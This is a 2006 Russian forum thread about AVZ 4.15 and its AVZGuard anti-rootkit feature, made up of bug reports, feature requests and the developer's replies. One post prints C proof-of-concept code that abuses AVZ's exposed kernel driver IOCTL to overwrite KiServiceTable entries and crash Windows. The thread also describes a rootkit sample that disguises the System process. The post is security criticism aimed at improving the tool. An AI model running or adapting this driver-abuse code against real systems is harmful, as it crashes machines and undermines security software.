обращаю внимание, что глюк с процессом System остался. хотя его легко отфильтровать либо по имени, либо по PIDу из первой десятки...
обращаю внимание, что глюк с процессом System остался. хотя его легко отфильтровать либо по имени, либо по PIDу из первой десятки...
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
А если зловред создаст процесс с именем System ?Сообщение от MOCT
чтобы удовлетворяло изложенным мной критериям? это будет проблематично ;-) если кто-то готов поспорить, то пусть предъявит concept code
Я думаю есть другие критерии проверки, что это действительно тот system а сравнивать имена не лучший вариант.чтобы удовлетворяло изложенным мной критериям? это будет проблематично ;-) если кто-то готов поспорить, то пусть предъявит concept code
ну, вот-первых, у меня связка из двух условий.
а во-вторых, мое предложение еще никто не опроверг.
так что необоснованные возражения не принимаются ;-))
Увы, но опровергнуть придется... в моей книге будет пример, именуемый rkkm3a, его упрощенный откомпилированный вариант лежит на нашем FTP, имя файла - test_sys.zip. Нужно распаковать пример, а затем запустить run_me.bat и посмотреть список процессов (в AVZ или по трем кнопкам - будет интересно ...). Собственно процесс System станет виден как Hacked с PID=10000, а первый попавшийся процесс получит PID 4 (я не менял его имени, чтобы можно было увидеть, что это за процесс ...).
тогда все плохо
Пессимизм - двигатель прогрессатогда все плохо
Не совсем плохо - если после того ядреного примера запустить AVZ, то он начнет вопить про скрытый процесс - из-за нестыковок. Так что с System проблему я решу, но придется проверки в KernelMode проводитьтогда все плохо
AVZGuard - это сильно. Спасибо, Олег, AVZ превратилась в мощнейший инструмент для борьбы с вредоносным ПО.
Месть - мечта слабых, прощение - удел сильных.
Поддержать проект можно здесь
1. Справка "Диспетчер процессов"
Не указано о закладке "Окна процесса".
2. Справка "Диспетчер служб и драйверов"
Особенностью диспетчера служб и драйверов AVZ является возможность использования в его работы системы противодействия
^^^^^^^^^^^^^^^^^^
3. Несколько системных длл не найдены в базе безопасных - это у меня не установленны некоторые апдейты или в базе нет? (ОС -Вин98 IE6SP1: WININET.DLL-6.00.2800.1525 URLMON.DLL- 6.00.2800.1525 MSHTML.DLL - 6.00.2800.1528)
3.1. Удаляются ли из базы безопасных старые версии системных файлов замененных в апдейтах?
4. При использовании в скрипте AddToLog перед RunScan добавления к логу затираются - добавить в справку или исправить (вынести в команды скрипта функцию очистки лога и убрать ее из RunScan)
Последний раз редактировалось Oro; 23.02.2006 в 21:54.
*Желаю у дачи
Юстас
1. Это упущение, допишу ...
2. Очепятка
3. Это нормально ... стоит прислать их для включения в базу (см. ссылку "прислать чистые файлы" на главной странице virusinfo). Дело в том, что в базу чистых попадают наиболее распространенные версии файлов, но естественно не все
3.1 Нет, все версии хрянятся пожизненно в виде файлов у меня в хранилище и подписей в базах. Дело в том, что апдейты устанавливают далеко не все ... поэтому хранятся все варианты. По хранилищу с чистыми файлами периодически гоняются антивирусы, в частности VBA - для поиска ложных срабатываний эвристики
4. Да, этот баг уже исправлен, я скоро выпущу новую версию, в которой это испавлено
опять появился... интересно это моя или avz проблема...
Это если перезапустить AVZ - он по прежнему будет видеть такой процесс ? Если да, то это уже любопытно. Если нет - скорее всего какой-то из процесс периодически создается и завершается.
Да, остаётся. Есть какие нибудь предложения?
Может быть, имеет смысл сделать отдельный пункт меню для стандартных (идущих с программой) скриптов, в котором можно будет сразу выбрать и выполнить их? Зачем - имхо это очень удобно. Вот ситуация, где это очень пригодилось бы
Здесь на форуме часто советуют включить противодействие руткитам. Кроме того в справке про AVZGuard описана такая схема его использования:
Смотрим на пункт 2. По-моему запускать проверку системы с эвристической проверкой, проверкой запущенных процессов, поиском кейлоггеров, поиском подозрительных портов, проверкой жестких дисков и поиском ошибок в LSP в данном случае вовсе не обязательно, потому что это лишнее, ведь нужно только блокировать работу руткитов, а не проверять все и вся. Так вот, в этом случае и в случае, когда на форуме советуют включить противодействие руткитам было бы очень удобно не запускать для этого проверку всего и вся, а использовать стандартный скрипт, который выполнит только детектирование и блокировку работы руткитов и напишет об этом в протокол.1. Закрыть все приложения
2.Запустить AVZ, включить противодействие руткитам UserMode и KernelMode и пролечить систему
3.Включить AVZGuard (это приведет к автоматическому отключению антируткита KernelMode)
Т.е. я предлагаю сделать стандартный скрипт, назовем его, скажем, "Поиск и блокировка RootKit", выполняющий только детектирование и блокировку работы руткитов + пишет об этом в протокол. Думаю, стоит сделать дополнительный пункт меню (скажем, в меню Файл) назовем его, скажем "Выполнить стандартный скрипт", и в нем подпункты с названиями стандартных скриптов. По-моему так будет гораздо удобнее. И чтобы не просить пользователя запустить проверку всего и вся для противодействия руткитам, достаточно будет сказать к примеру: Выполните "Файл" -> "Выполнить стандартный скрипт" -> "Поиск и блокировка RootKit". Всё. Ничего лишнего не проверяется и не делается.
P.S. Можно, конечно, это сделать просто как дополнительную функцию, без всяких скриптов - и вызывать ее можно например через меню "Файл" -> "Поиск и блокировка RootKit". Главное - сама возможность.
Последний раз редактировалось kps; 24.02.2006 в 03:24.
Месть - мечта слабых, прощение - удел сильных.
Поддержать проект можно здесь
2Зайцев Олег:
1. AVZ жалуется на проводник.
c:\winnt\explorer.exe >>> подозрение на Trojan-Spy.Win32.Qeds.a ( 0C50E364 05FD200F 0020B2F7 00274247 243472)
Explorer.exe версии 5.00.3700.6690 пропатчен на предмет отображения в трее иконок в 256-цветной палитре.
000088EE: 01 11
00014E25: 01 11
00014E36: 01 11
Подробности: http://www.dr-hoiby.com/TrayIconIn25...3700_6690.html
AVZ версия 4.15 от 22.02.2006
ОС Windows 2004 SP4 Rus
2. Нельзя ли добавить поддержку обновления баз из любого каталога?
В диалоге "Оперативное автоматическое обновление" в списке "Источник" явно не хватает третьего пункта "Указать источник...". :-)
3. А нельзя ли так же выкладывать новые базы упакованные в архиве (например в zip-е)?
Sorry, опечатка! :-) Windows конечно же 2000-чная.
to kps
Сделаем так - по аналогии мо "микропрограммами восстановления" я введу "микропрограммы для выполнения стандартных операций", и код этих программ будет в AV базе ... что позволит добавлять и обновлять их по мере необходимости или обнаружения багов. В эту базу я внесу два скрипта для Virusinfo + скрипты для типовых действий типа нейтрализации руткитов, поиска кейлоггеров, проверки систмы и т.п
to Sam
1. Пропатченный файл нужно прислать на [email protected] - я подправлю базы и внесу пропатченный файл в базу безопасных
2. Источник указать можно - обновляя базы скриптом. В соотв. команде скрипта есть возможность задать все параметры ... правда из каталога он обновляться не умеет, только FTP/HTTP. Но со временем я доделаю возможность обновления из указанной папки в меню ...
3. А есть смысл ? Сила сжатия AVZ файлов превосходит RAR и 7-ZIP по эффективности (можно для пробы сжать любой из *.avz файлов - результат будет нулевым. Единственный плюс может быть только в случае создания архива все папки Base, чтобы скачать все файлы одним махом.
Наконец-то удалось посмотреть на главную новость версии 4.15 - AVZGuard, в связи с чем позволю себе немного покритиковать как саму эту "новую" концепцию, так и ее текущую реализацию. Начнем с реализации, а затем, если позволит время, плавно перейдем к концепции.
Итак, реализация.
Поглядел с полчаса, что называется "слабо вооруженным глазом", и вот что удалось обнаружить за это время (выборочно):
1) Читаем:
Это или вообще не реализовано, или реализовано не полностью, т.к. при включенном AVZGuard процесс AVZ легко убивается сторонним приложением, если оно было запущено до запуска AVZ (а ведь именно такой вариант развития событий - когда на компьютере пользователя уже распространилась разная живность, а потом запускается AVZ для борьбы с ней - является "штатным" для AVZ!).Доработки и усовершенствования:
[+++] Новая система AVZGuard, предназначенная для:
1. Защиты AVZ и указанных пользователем доверенных приложений от вредоносных программ
2) Далее:
Плохая реализация, легко обходится через симлинки. Иными словами, в текущий момент любое user-mode приложение может спокойно заблокировать AVZGuard, сняв все его перехваты в KiServiceTable, а потом, в дополнение, прибив сам AVZ.В момент активации системы все приложения делятся на две категории - доверенные и недоверенные. На доверенные приложения драйвер не оказывает никакого влияния, в то время как недоверенным запрещаются следующие операции:
...[*]Доступ к device\physicalmemory (что блокирует операции с физической памятью из UserMode)
...
3) Полностью отсутствует контроль за состоянием перехватов в KiServiceTable (т.е. AVZ не видит никаких закулисных манипуляций с этой таблицой). Да и в такой реализации совершенно не ясно, каким образом это можно осуществить, если "зверь" будет иметь собственный (запущенный, к примеру, во время загрузки системы) kernel-mode драйвер.
4) Далее читаем:
Если в точности последовать этому алгоритму, то вся работа AVZ заканчивается уже после 1-го пункта, т.к. включение AVZGuard сразу же после старта AVZ и следующим нажатием на кнопку "Пуск" почему-то приводит к такому сообщению об ошибке в Event Log-е:
Ситуацию временно нормализует другая последовательность действий:Код:Сбой при запуске службы "AVZ Kernel Driver" из-за ошибки Не удается найти текст сообщения с номером 0xAVZ Kernel Driver в файле сообщений ... <таких сообщений примерно штук 50> ... Не удается найти текст сообщения с номером 0xAVZ Kernel Driver в файле сообщений %2
1. Запускаем AVZ;
2. Нажимаем "Пуск", чтобы смог стартовать драйвер AVZ.sys, и только после этого включаем AVZGuard (и его драйвер AVZsg.sys, который, видимо, "опирается" на функциональность AVZ.sys для установки/снятия перехватов).
3. И далее уже по тексту...
5) Как и раньше (твержу об этом с самого момента появления драйвера AVZ!), все общение между AVZ и его драйверами происходит в открытом и (!!!) доступном снаружи виде. Т.е., к примеру, можно даже не писать никаких kernel-mode драйверов и не делать никаких манипуляций с PhysicalMemory - AVZ уже содержит в себе весь необходимый для этого код в совершенно открытом для использования чужими программами виде! Достаточно дождаться загрузки AVZ с его драйвером, и вам тут же становятся доступными любые средства манипуляции с KiServiceTable. Вот пример такого кода, который за полсекунды с помощью драйвера AVZ (функции "обнуления" KiServiceTable) валит систему в синьку (некоторые детали, само собой, опущены):
Ну, и так далее... Не буду дальше утомлять вас разными тонкостями и подробностями.Код:typedef struct _vars { DWORD dwServiceId; DWORD dwServiceAddress; } VARS; int main(int argc, char* argv[]) { HANDLE hDevice; VARS vInputBuffer; VARS vOutputBuffer; DWORD dwBytesReturned; printf("Waiting for AVZ driver to load... "); while (TRUE) { hDevice = CreateFile("\\\\.\\AVZKernelDeviceLink", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDevice != INVALID_HANDLE_VALUE) break; Sleep(100); } printf("OK\n"); vInputBuffer.dwServiceId = 0; vInputBuffer.dwServiceAddress = 0x00000000; while (TRUE) { if (!DeviceIoControl(hDevice, (DWORD)IOCTL_AVZ_SETSYSTEMSERVICEADDRESSBYNO, (void *) &vInputBuffer, sizeof(vInputBuffer), (void *) &vOutputBuffer, sizeof(vOutputBuffer), &dwBytesReturned, NULL)) { printf("DeviceIoControl() failed, error %d\n", GetLastError()); CloseHandle (hDevice); return 1; } vInputBuffer.dwServiceId++; } CloseHandle(hDevice); return 0; }
Концепция.
AVZ неумолимо движется в сторону создания монитора + сэндбокса (первые шаги очень уж сильно напоминают обсуждаемый в соседних ветках DefenseWall)? Тогда может вообще не стоит ограничиваться полу-работающими полумерами, а сразу перейти к созданию нормального монитора? Ведь существующая концепция AVZGuard, по большому счету, не выдерживает критики, и особенно в тех условиях работы, для которых она предназначена - а именно в системе, где уже процветает живность. Любой "зверь", использующий драйвер ядра, способен нейтрализовать AVZGuard, т.к. его "защита" прозрачна и построена на перехвате ядерных функций, который очень сложно (если вообще возможно) контролировать в "штатных" условиях запуска AVZ (т.е. после загрузки системы)!
Иными словами: "Хватит уже полумер - даешь монитор!!!"
Уф-ф-ф-ф... устал уже давить батоны - пойду Олимпиаду смотреть!
Последний раз редактировалось aintrust; 24.02.2006 в 19:18.
Ваши права в разделе
